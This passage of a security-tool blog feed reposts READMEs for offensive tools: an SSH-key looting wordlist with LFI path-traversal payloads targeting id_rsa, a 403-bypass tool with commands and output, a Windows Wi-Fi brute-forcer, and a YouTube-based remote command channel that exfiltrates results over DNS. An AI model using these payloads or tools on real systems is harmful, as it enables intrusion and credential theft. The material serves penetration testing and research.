'2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/some-tweak-to-hide-jwt-payload-values" rel="nofollow" target="_blank" title="Download Some-Tweak-To-Hide-Jwt-Payload-Values">Download Some-Tweak-To-Hide-Jwt-Payload-Values</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73888386767938395432024-03-09T08:30:00.001-03:002024-03-09T08:30:00.242-03:00SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/s897/SSH%20Private%20Key%20Looting%20Wordlists.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" 
data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/w640-h362/SSH%20Private%20Key%20Looting%20Wordlists.png" width="640" /></a></div><p><br /></p><p>SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>LFI for Lateral Movement? Gain SSH Access?</b></span><br /> <pre><code>?file=../../../../../../../../home/user/.ssh/id_rsa<br />?file=../../../../../../../../home/user/.ssh/id_rsa-cert<br /></code></pre> <br /><span style="font-size: x-large;"><b>SSH Private Key Looting <a href="https://www.kitploit.com/search/label/Wordlists" target="_blank" title="Wordlists">Wordlists</a></b></span><br /> <p>This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. 
These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.</p> <br /><span style="font-size: large;"><b>Wordlist Files</b></span><br /> <ul> <li><strong>ssh-priv-key-loot-common.txt</strong>: Default and common naming conventions for SSH private key files.</li> <li><strong>ssh-priv-key-loot-medium.txt</strong>: Probable file names without backup file extensions.</li> <li><strong>ssh-priv-key-loot-extended.txt</strong>: Probable file names with backup file extensions.</li> <li><strong>ssh-priv-key-loot-*_w_gui.txt</strong>: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>These wordlists can be used with tools such as Burp Intruder, Hydra, custom Python scripts, or any other <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> tool that supports custom wordlists. They can help expand the scope of your brute-forcing or <a href="https://www.kitploit.com/search/label/Enumeration" target="_blank" title="enumeration">enumeration</a> efforts when targeting SSH private key files.</p> <br /><span style="font-size: large;"><b>Acknowledgements</b></span><br /> <p>This <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> repository was inspired by John Hammond in his vlog "<a href="https://www.youtube.com/watch?v=2rqb3YSa1SE" rel="nofollow" target="_blank" title="Don't Forget This One">Don't Forget This One </a><a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="Hacking">Hacking</a> Trick."</p> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>Please use these wordlists responsibly and only on systems you are authorized to test. 
Unauthorized use is illegal.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/SSH-Private-Key-Looting-Wordlists" rel="nofollow" target="_blank" title="Download SSH-Private-Key-Looting-Wordlists">Download SSH-Private-Key-Looting-Wordlists</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-58469355253761489642024-03-08T17:36:00.003-03:002024-03-08T17:36:22.430-03:00Nomore403 - Tool To Bypass 403/40X Response Codes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/s1233/Nomore403.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1233" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/w640-h218/Nomore403.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div> <p><code>nomore403</code> is an innovative tool designed to help <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. 
Unlike other solutions, <code>nomore403</code> automates various <a href="https://www.kitploit.com/search/label/Techniques" target="_blank" title="techniques">techniques</a> to seamlessly navigate past these access restrictions, offering a broad range of strategies from header <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> to method tampering.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Prerequisites</b></span><br /> <p>Before you install and run <code>nomore403</code>, make sure you have the following:</p> <ul> <li>Go 1.15 or higher installed on your machine.</li> </ul> <br /><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>From Releases</b></span><br /> <p>Grab the latest release for your OS from our <a href="https://github.com/devploit/nomore403/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page.</p> <br /><span style="font-size: large;"><b>Compile from Source</b></span><br /> <p>If you prefer to compile the tool yourself:</p> <pre><code>git clone https://github.com/devploit/nomore403<br />cd nomore403<br />go get<br />go build<br /></code></pre> <br /><span style="font-size: x-large;"><b>Customization</b></span><br /> <p>To edit or add new bypasses, modify the payloads directly in the <a href="https://github.com/devploit/nomore403/tree/main/payloads" rel="nofollow" target="_blank" title="payloads">payloads</a> folder. 
nomore403 will automatically incorporate these changes.</p> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <br /><span style="font-size: large;"><b>Output example</b></span><br /> <pre><code>Target: https://domain.com/admin<br />Headers: false<br />Proxy: false<br />User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)<br />Method: GET<br />Payloads folder: payloads<br />Custom bypass IP: false<br />Follow Redirects: false<br />Rate Limit detection: false<br />Verbose: false<br /><br />━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━<br />403 429 bytes https://domain.com/admin<br /><br />━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━<br /><br />━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━<br /><br />━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━<br />200 2047 bytes https://domain.com/;///..admin<br /><br />━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━<br />403 429 bytes HTTP/1.0<br />403 429 bytes HTTP/1.1<br />403 429 bytes HTTP/2<br /><br />━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━<br />200 2047 bytes https://domain.com/%61dmin<br /></code></pre> <br /><span style="font-size: large;"><b>Basic Usage</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin<br /></code></pre> <br /><span style="font-size: large;"><b>Verbose Mode + Proxy</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v<br /></code></pre> <br /><span style="font-size: large;"><b>Parse request from Burp</b></span><br /> <pre><code>./nomore403 --request-file request.txt<br /></code></pre> <br /><span style="font-size: large;"><b>Use 
<a href="https://www.kitploit.com/search/label/Custom%20Header" target="_blank" title="custom header">custom header</a> + specific IP address for bypasses</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -H "Environment: Staging" -b 8.8.8.8<br /></code></pre> <br /><span style="font-size: large;"><b>Set new max of goroutines + add delay between requests</b></span><br /> <pre><code>./nomore403 -u https://domain.com/admin -m 10 -d 200<br /></code></pre> <br /><span style="font-size: x-large;"><b>Options</b></span><br /> <pre><code>./nomore403 -h<br />Command line application that automates different ways to bypass 40X codes.<br /><br />Usage:<br /> nomore403 [flags]<br /><br />Flags:<br /> -i, --bypass-ip string Use a specified IP address or hostname for <a href="https://www.kitploit.com/search/label/Bypassing" target="_blank" title="bypassing">bypassing</a> access controls. Injects this IP in headers like 'X-Forwarded-For'.<br /> -d, --delay int Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).<br /> -f, --folder string Specify the folder location for payloads if not in the same directory as the executable.<br /> -H, --header strings Add one or more custom headers to requests. Repeatable flag for multiple headers.<br /> -h, --help help for nomore403<br /> --http Use HTTP instead of HTTPS for requests defined in the request file.<br /> -t, --http-method string Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.<br /> -m, --max-goroutines int Limit the maximum number of concurrent goroutines to manage load (default: 50). 
(default 50)<br /> --no-banner Disable the display of the startup banner (default: banner shown).<br /> -x, --proxy string Specify a proxy server for requests, e.g., 'http://server:port'.<br /> --random-agent Enable the use of a randomly selected User-Agent.<br /> -l, --rate-limit Halt requests upon encountering a 429 (rate limit) HTTP status code.<br /> -r, --redirect Automatically follow redirects in responses.<br /> --request-file string Load request configuration and flags from a specified file.<br /> -u, --uri string Specify the target URL for the request.<br /> -a, --user-agent string Specify a custom User-Agent string for requests (default: 'nomore403').<br /> -v, --verbose Enable verbose output for detailed request/response logging.<br /></code></pre> <br /><span style="font-size: x-large;"><b>Contributing</b></span><br /> <p>We welcome contributions of all forms. Here's how you can help:</p> <ul> <li>Report bugs and suggest features.</li> <li>Submit pull requests with bug fixes and new features.</li> </ul> <br /><span style="font-size: x-large;"><b>Security Considerations</b></span><br /> <p>While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.</p> <br /><span style="font-size: x-large;"><b>License</b></span><br /> <p>nomore403 is released under the MIT License. See the <a href="https://github.com/devploit/dontgo403/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br /><span style="font-size: x-large;"><b>Contact</b></span><br /> <p><a href="https://twitter.com/devploit/" rel="nofollow" target="_blank" title="Tool to bypass 403/40X response codes. (10)"><img alt="Tool to bypass 403/40X response codes. 
(3)" src="https://img.shields.io/badge/-Twitter-blue?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/devploit/" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/devploit/nomore403" rel="nofollow" target="_blank" title="Download Nomore403">Download Nomore403</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-43932165222763295862024-03-07T08:30:00.007-03:002024-03-07T08:30:00.234-03:00WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p><pre><br /></pre> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi <a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="hacking">hacking</a> script that uses netsh and native <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> to create a wifi bruteforcer. 
This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <p>The packages are minimal or nearly none. The package install command is:</p> <pre><code>pip install rich pyfiglet<br /></code></pre> <p>That's it.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>So listing the features:</p> <ul> <li><em>Overall Features:</em> <ul> <li>We can use custom interfaces or non-default interfaces to run the attack.</li> <li>Well-defined way of using netsh and listing and utilizing targets.</li> <li>Upgradeability.</li> </ul> </li> <li><em>Code-Wise Features:</em> <ul> <li>Interactive menu-driven system with <code>rich</code>.</li> <li>Versatility in using interface, targets, and password files.</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How it works</b></span><br /> <p>So this is how the <a href="https://www.kitploit.com/search/label/Bruteforcer" target="_blank" title="bruteforcer">bruteforcer</a> works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640" /></a></div> <ul> <li> <p><em>Provide Interface:</em></p> <ul> <li>The user is required to provide the network interface for the tool to use.</li> <li>By default, the interface is set to <code>Wi-Fi</code>.</li> </ul> </li> <li> <p><em>Search and Set Target:</em></p> <ul> <li>The user must search for and select the target network.</li> <li>During this process, the tool performs the following sub-steps: <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> </ul> </li> <li> <p><em>Input Password File:</em></p> <ul> <li>The user inputs the path to the password file.</li> <li>The default path for the password file is <code>./wordlist/default.txt</code>.</li> </ul> </li> <li> <p><em>Run the Attack:</em></p> <ul> <li>With the target set and the password file ready, the tool is now prepared to initiate the attack.</li> </ul> </li> <li> <p><em>Attack Procedure:</em></p> <ul> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken: <ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> </ul> </li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How to run this</b></span><br /> <p style="text-align: left;">After installing all the packages, just run <code>python main.py</code>; the rest is <a href="https://www.kitploit.com/search/label/History" target="_blank" title="history">history</a>. Make sure you run this on Windows, because this won't work on any other OS. 
The interface looks like this:</p><p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <br /><span style="font-size: large;"><b>Contributions</b></span><br /> <p>For contributions:</p> <ul> <li><em>First Clone:</em> First clone the repo into your dev env and do the edits.</li> <li><em>Comments:</em> I would appreciate it if you could add comments explaining your POV and also explaining the upgrade.</li> <li><em>Submit:</em> Submit a PR for me to verify the changes and approve it if necessary.</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download WinFiHack</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35201542899401210172024-03-06T08:30:00.022-03:002024-03-06T08:30:00.127-03:00SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" id="BLOGGER_PHOTO_ID_7343001695115503938" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640" /></a></p><br /> <p>SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.</p> <p>The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The <a href="https://www.kitploit.com/search/label/QR%20codes" target="_blank" title="QR codes">QR codes</a> in the videos can use cleartext or AES-encrypted values.</p> <p>It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a <a href="https://www.kitploit.com/search/label/Persistence" target="_blank" title="persistence">persistence</a> method using only web requests to the Google API.</p><span><a name='more'></a></span><p><br /></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" id="BLOGGER_PHOTO_ID_7343001695115503938" src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640" /></a></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Run the <a href="https://www.kitploit.com/search/label/Listener" target="_blank" title="listener">listener</a> in your Windows system:</p> <p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o"><img alt="" border="0" height="63" id="BLOGGER_PHOTO_ID_7343001700687977618" src="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o=w640-h63" width="640" /></a></p> <p>It will check the Youtube channel at a configurable interval (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a>:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7343001706210908002" src="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo=w496-h640" width="496" /></a></p> <p>Once it finds a <a href="https://www.youtube.com/shorts/-JcDf4pF0qA" rel="nofollow" target="_blank" title="new video">new video</a> in the channel, it decodes the QR code from the video thumbnail and executes the command; the response is base64-encoded and exfiltrated over DNS:</p> <p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0"><img alt="" border="0" height="154" id="BLOGGER_PHOTO_ID_7343001709859404242" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0=w640-h154" width="640" /></a></p> <p>This also works for QR codes with AES-encrypted payloads and for longer command responses. In this example, the file "dirtemp_aes.avi" from <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a> is uploaded and the content of c:\temp is exfiltrated using several DNS queries:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343001717962333954" src="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8=w640-h412" width="640" /></a></p> <p>Logging to a file is optional, but you must make sure the folder for that file exists on the system; the default value is "c:\temp\.sharpcoverttube.log". 
DNS <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> is also optional and can be tested using Burp's Collaborator:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo"><img alt="" border="0" height="108" id="BLOGGER_PHOTO_ID_7343001721497621394" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo=w640-h108" width="640" /></a></p> <p>As an alternative, I created <a href="https://github.com/ricardojoserf/dns-exfiltration" rel="nofollow" target="_blank" title="this repository">this repository</a> with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.</p> <br /><span style="font-size: large;"><b>Configuration</b></span><br /> <p>There are some values you can change; you can find them in the Configuration.cs file for the <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube/Configuration.cs" rel="nofollow" target="_blank" title="regular binary">regular binary</a> and <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube_Service/Configuration.cs" rel="nofollow" target="_blank" title="the service binary">the service binary</a>. 
